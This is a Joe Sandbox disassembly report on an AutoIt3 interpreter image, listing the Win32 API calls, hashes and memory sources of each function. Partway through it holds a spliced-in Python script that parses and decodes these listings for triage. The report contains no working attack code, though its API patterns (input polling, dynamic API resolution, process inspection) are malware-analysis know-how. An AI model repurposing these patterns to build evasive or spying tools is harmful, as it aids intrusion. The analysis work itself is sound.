                                        • Part of subcall function 0085AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0085AA6F
                                        • Part of subcall function 0085AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0085AA82
                                        • Part of subcall function 0085AA52: GetCurrentThreadId.KERNEL32 ref: 0085AA89
                                        • Part of subcall function 0085AA52: AttachThreadInput.USER32(00000000), ref: 0085AA90
                                      • GetFocus.USER32 ref: 0085AC2A
                                        • Part of subcall function 0085AA9B: GetParent.USER32(?), ref: 0085AAA9
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085AC73
                                      • EnumChildWindows.USER32(?,0085ACEB), ref: 0085AC9B
                                      • __swprintf.LIBCMT ref: 0085ACB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                      • String ID: %s%d
                                      • API String ID: 1941087503-1110647743
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00862318
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 3964851224-769500911
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0087F2F0
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0087F320
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0087F453
                                      • CloseHandle.KERNEL32(?), ref: 0087F4D4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: 092a959fa0ed1e8d4bb54917102846448b636aa507d9ec7660646e409251708f
                                      • Instruction ID: 88e50e73841d5bc9d770fa0d39bb9b1c0c34cbf3c317ea42dae99cbe5ee98887
                                      • Opcode Fuzzy Hash: 092a959fa0ed1e8d4bb54917102846448b636aa507d9ec7660646e409251708f
                                      • Instruction Fuzzy Hash: 74817CB16443019FD760EF29DC86B2AB7E5FF44710F14891DFA99DB2D2D6B0E8008B92
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0088147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0088075D
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088079C
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008807E3
                                      • RegCloseKey.ADVAPI32(?,?), ref: 0088080F
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0088081C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                      • String ID:
                                      • API String ID: 3440857362-0
                                      • Opcode ID: 980addf6e617f16732aad03e7693e6e6f5c596611d8855853514c1727bc45c14
                                      • Instruction ID: 8642a92b94274a1937230a8615b10719abbfdfbd42b438643f9a8acdc5d01829
                                      • Opcode Fuzzy Hash: 980addf6e617f16732aad03e7693e6e6f5c596611d8855853514c1727bc45c14
                                      • Instruction Fuzzy Hash: E4515771208204AFC744EB68CC85E6AB7E9FF84305F04892DF595C72A1DB31E948CF92
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087E010
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0087E093
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0087E0AF
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0087E0F0
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087E10A
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867E51,?,?,00000000), ref: 00814041
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867E51,?,?,00000000,?,?), ref: 00814065
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                      • String ID:
                                      • API String ID: 327935632-0
                                      • Opcode ID: ffaef4c8b4502cfc38bbf91a15d10e95871eb59df79444cb910584de06a8b4b3
                                      • Instruction ID: f53fc7a9d641eb88c885a45674af9822e017f07630395cb03db1e2bd4c3523ba
                                      • Opcode Fuzzy Hash: ffaef4c8b4502cfc38bbf91a15d10e95871eb59df79444cb910584de06a8b4b3
                                      • Instruction Fuzzy Hash: B051E575A006099FDB10EFA8C8859ADB7B8FF08315B14C0A5E919EB351DB31ED85CF92
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0086EC62
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0086EC8B
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0086ECCA
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0086ECEF
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0086ECF7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                      • String ID:
                                      • API String ID: 1389676194-0
                                      • Opcode ID: 17488b0404dbcaf168498f83b9882b0b4e60113414600214c6c1602b2c5a489d
                                      • Instruction ID: b218f42281b96394f7c6f038e7e7ea22202ff558c07aeac3f17d068ef763bc36
                                      • Opcode Fuzzy Hash: 17488b0404dbcaf168498f83b9882b0b4e60113414600214c6c1602b2c5a489d
                                      • Instruction Fuzzy Hash: 58511975A00505DFDB01EFA8C9859AEBBF5FF08314B188099E909AB3A2CB31AD51DF51
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5793d4ebdd537a7f824bf0867f78e6c62912d0bbac7551ea93d57585a0274674
                                      • Instruction ID: 0c9a35bfbd3b6ae1a8a890561b2a222e2f2e4296406fe2b24a7f907c61a57bfa
                                      • Opcode Fuzzy Hash: 5793d4ebdd537a7f824bf0867f78e6c62912d0bbac7551ea93d57585a0274674
                                      • Instruction Fuzzy Hash: 5741C175904118AFE718FB28CC88FA9BBB8FB09310F190166E996E72D1D770AD41EB51
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00802727
                                      • ScreenToClient.USER32(008C77B0,?), ref: 00802744
                                      • GetAsyncKeyState.USER32(00000001), ref: 00802769
                                      • GetAsyncKeyState.USER32(00000002), ref: 00802777
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: 2a90a27ef8589a3122408c7063fa4940a32c22e69296b2d9bd28191d8f82c047
                                      • Instruction ID: 1de1013f9bef284769a50dc9de8dd910106a3c20e453aac7811ac207c97c42f8
                                      • Opcode Fuzzy Hash: 2a90a27ef8589a3122408c7063fa4940a32c22e69296b2d9bd28191d8f82c047
                                      • Instruction Fuzzy Hash: 18413975504219FFDF15AF68CC48AE9BB74FB45324F20835AF828E22A0CB70A950DB91
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 008595E8
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00859692
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0085969A
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 008596A8
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008596B0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: f25f5fc8ef54eb0dc018253dd0ed74734f0c8b8b9f8832ebdc16179eed138222
                                      • Instruction ID: 81437aa28620cc5f0ab5c5f03a8fb8fdd2fa533221b6e68d6cd727bd908e0142
                                      • Opcode Fuzzy Hash: f25f5fc8ef54eb0dc018253dd0ed74734f0c8b8b9f8832ebdc16179eed138222
                                      • Instruction Fuzzy Hash: FF31CC71900219EFDB14CFA8D94CA9E3BB5FB54316F104229FD65EB2D0C3B09928DB91
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0085BD9D
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0085BDBA
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0085BDF2
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0085BE18
                                      • _wcsstr.LIBCMT ref: 0085BE22
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                      • String ID:
                                      • API String ID: 3902887630-0
                                      • Opcode ID: 2e027b3f874f785539b24b8e987c6fd2e064fc6888898170d4c9ae64e338a610
                                      • Instruction ID: 1b31f7b852f04b1e49c645eee2f9827cc8273691cfb23c77e4e8cd907709f6fc
                                      • Opcode Fuzzy Hash: 2e027b3f874f785539b24b8e987c6fd2e064fc6888898170d4c9ae64e338a610
                                      • Instruction Fuzzy Hash: 87213B32204214BFEB255B39EC0AEBB7BACFF55760F14402AFD09CA191EF61DC409661
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • GetWindowLongW.USER32(0114B1E0,000000F0), ref: 0088B804
                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0088B829
                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0088B841
                                      • GetSystemMetrics.USER32(00000004), ref: 0088B86A
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0087155C,00000000), ref: 0088B888
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Long$MetricsSystem
                                      • String ID:
                                      • API String ID: 2294984445-0
                                      • Opcode ID: 125258f9a792239291bc5322c2b91ba24aa9f74568e4de61c5dc0206ab1d1542
                                      • Instruction ID: 64fb62cf36209ad9710a857d05174f281eec39a4621e594ff8838b7079a87096
                                      • Opcode Fuzzy Hash: 125258f9a792239291bc5322c2b91ba24aa9f74568e4de61c5dc0206ab1d1542
                                      • Instruction Fuzzy Hash: C9214F71A14259AFCB24AF388C08B6A3BA8FF85765F154739F925D62E0D7309910DF90
                                      APIs
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00859ED8
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859F0A
                                      • __itow.LIBCMT ref: 00859F22
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859F4A
                                      • __itow.LIBCMT ref: 00859F5B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow$_memmove
                                      • String ID:
                                      • API String ID: 2983881199-0
                                      • Opcode ID: 415a8475132ce6727baf77ada8826794b65bd252f86056bb99e71ee5f8cf5db7
                                      • Instruction ID: d40ec275fd9c3dc278e104ce7665d2924f0b0fde96463d45b8718de02f2f6920
                                      • Opcode Fuzzy Hash: 415a8475132ce6727baf77ada8826794b65bd252f86056bb99e71ee5f8cf5db7
                                      • Instruction Fuzzy Hash: 76217431601204AFDB11AB54C88AEEE7BACFB95751F054025FE45D7281EA70C9899BA2
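The "APIs" listings above (the OpenProcess/GetProcessMemoryInfo, LoadLibraryW/GetProcAddress, GetCursorPos/GetAsyncKeyState and PostMessageW/SendMessageW functions) show raw hexadecimal arguments that only mean something once decoded against the Win32 headers. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed binary: it parses entries in the exact text form used on this page, decodes the process access mask, window-message and virtual-key constants, and attaches coarse behaviour tags to each function. The sample input is constructed from lines on this page; the tag names and the splitting of the listing at each "APIs" header are this example's own conventions. One caveat when reading the tags: the snapshot name (hcaresult_3_2_800000_Autoit3.jbxd) indicates that these functions belong to the AutoIt3 interpreter image mapped at 0x00800000, so what they record is capability the interpreter makes available to a script, not behaviour the dropped script necessarily exercised; use them as triage hints, not verdicts.

```python
import re

# Added example: parser/decoder for Joe Sandbox IDA-plugin "APIs" entries.
# Matches the three forms on this page:
#   • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0087F2F0
#   • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
#   • GetForegroundWindow.USER32 ref: 00876170
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constant values from the public Win32 headers (winnt.h, winuser.h, commctrl.h).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
WINDOW_MESSAGES = {
    0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH",
    0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
    0x1004: "LVM_GETITEMCOUNT", 0x102C: "LVM_GETITEMSTATE",
}
VIRTUAL_KEYS = {0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON"}


def _arg(tok):
    """'?' means the decompiler could not recover the value; otherwise hex."""
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)  # "-00000001" parses as -1
    except ValueError:
        return tok


def parse_blocks(text):
    """Split the listing at each 'APIs' header; return one entry list per block."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = API_RE.match(line)
        if not m or current is None:
            continue
        args = m.group("args")
        current.append({
            "func": m.group("func"), "module": m.group("mod"),
            "args": [] if args is None else [_arg(a) for a in args.split(",")],
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub"),
        })
    return blocks


def decode_flags(mask, table):
    """Name every known bit in mask; unknown bits are kept as a trailing hex value."""
    names = [name for bit, name in sorted(table.items()) if mask & bit]
    rest = mask & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def annotate(entry):
    """Human-readable meaning of the constant argument, or None if nothing to decode."""
    f, a = entry["func"], entry["args"]
    if f == "OpenProcess" and a and a[0] is not None:
        return f"OpenProcess access={decode_flags(a[0], PROCESS_ACCESS)}"
    if f in ("SendMessageW", "PostMessageW") and len(a) > 1 and a[1] is not None:
        return f"{f} msg={WINDOW_MESSAGES.get(a[1], f'0x{a[1]:X}')}"
    if f == "GetAsyncKeyState" and a and a[0] is not None:
        return f"GetAsyncKeyState key={VIRTUAL_KEYS.get(a[0], f'0x{a[0]:X}')}"
    return None


def tag_block(entries):
    """Coarse behaviour tags (this example's own names) from a function's direct calls."""
    funcs = {e["func"] for e in entries if e["subcall"] is None}
    tags = set()
    if {"LoadLibraryW", "GetProcAddress"} <= funcs:
        tags.add("dynamic-api-resolution")
    if "OpenProcess" in funcs and {"GetProcessMemoryInfo", "GetProcessIoCounters"} & funcs:
        tags.add("process-inspection")
    if "GetAsyncKeyState" in funcs or "GetCursorPos" in funcs:
        tags.add("input-state-polling")
    if any(e["func"] == "PostMessageW" and len(e["args"]) > 1
           and e["args"][1] in (0x0201, 0x0202) for e in entries):
        tags.add("synthetic-mouse-click")
    return tags


def summarize(text):
    """One row per block: address of its first direct call, tags, decoded arguments."""
    rows = []
    for block in parse_blocks(text):
        direct = [e for e in block if e["subcall"] is None]
        rows.append({
            "first_ref": f"{direct[0]['ref']:08X}" if direct else None,
            "tags": sorted(tag_block(block)),
            "decoded": [d for d in map(annotate, block) if d],
        })
    return rows


# Constructed sample: four "APIs" blocks copied from this report page.
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0087F2F0
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0087F320
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0087F453
• CloseHandle.KERNEL32(?), ref: 0087F4D4
APIs
  • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087E010
• GetProcAddress.KERNEL32(00000000,?), ref: 0087E093
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0087E10A
APIs
• GetCursorPos.USER32(?), ref: 00802727
• GetAsyncKeyState.USER32(00000001), ref: 00802769
APIs
• PostMessageW.USER32(?,00000201,00000001), ref: 00859692
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859F0A
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

Feeding the whole report page through summarize() gives one row per dissected function, which is a faster first pass than reading the hashes by eye; anything tagged dynamic-api-resolution or process-inspection is then worth opening in the memory dump to see which strings reach GetProcAddress or OpenProcess.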
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00876159
                                      • GetForegroundWindow.USER32 ref: 00876170
                                      • GetDC.USER32(00000000), ref: 008761AC
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 008761B8
                                      • ReleaseDC.USER32(00000000,00000003), ref: 008761F3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      • Opcode ID: 75a5ccf245a0d6f75c583b1b1a1da813ee68e84819456f2dc718ccae1d268628
                                      • Instruction ID: 6bbca6e3b59b83bf51866c4c8c59e3e2f0e2adbb0c3c8913ddcdacdaa1885c56
                                      • Opcode Fuzzy Hash: 75a5ccf245a0d6f75c583b1b1a1da813ee68e84819456f2dc718ccae1d268628
                                      • Instruction Fuzzy Hash: 44215075A00604AFD754EF69DD88A5ABBF5FF48350B048469E94AD7252DB30AC00CB91
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00801729
                                      • SelectObject.GDI32(?,00000000), ref: 00801738
                                      • BeginPath.GDI32(?), ref: 0080174F
                                      • SelectObject.GDI32(?,00000000), ref: 00801778
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                       • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                       • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 21d9f940c1b5e2eb1af9d8cf7b268bdcdfb857734f7aaefbab473b596e60baac
